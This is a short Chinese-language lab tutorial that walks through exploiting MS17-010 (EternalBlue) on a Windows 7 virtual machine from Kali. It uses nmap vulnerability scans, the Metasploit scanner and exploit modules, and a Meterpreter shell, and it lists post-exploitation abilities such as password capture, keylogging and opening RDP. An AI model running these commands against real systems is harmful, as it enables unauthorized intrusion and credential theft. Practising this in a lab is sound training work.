环境准备
1、windows7: MSDN 不用安装vmtool
2、VM ware
3、kali
流程
1、打开kali,启动Metasploit简称msf,启动命令是命令窗口输入
2、msf自带nmap,扫描目的ip
nmap -A -sV 10.10.10.141 #扫描靶机的所有信息和版本信息
nmap --script=vuln 10.10.10.141 #使用namp对靶机进行已知漏洞探测
#--script可以指定脚本
#vuln脚本包含了许多已知漏洞
3、查找对应漏洞
search ms17-010
4、选择合适的漏洞探测模块,测试漏洞是否存在
use auxiliary/scanner/smb/smb_ms17_010
set rhosts IP
run
5、选择合适的利用模块,也可以直接输入 use 模块编号
use exploit/windows/smb/ms17_010_eternalblue
set rhosts IP
run
6、进入Meterpreter, Meterpreter 是 Metasploit 框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell 的链接。Meterpreter shell 作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开 shell、得到用户密码、上传下载远程主机的文件、运行 cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络接口和IP地址等信息。
进入Meterpreter,执行shell命令getshell,并打开3389,尝试远程连接。
执行shell可能会乱码,把kali设成中文版,全局用UTF-8
sudo dpkg-reconfigure locales
然后重启就好了。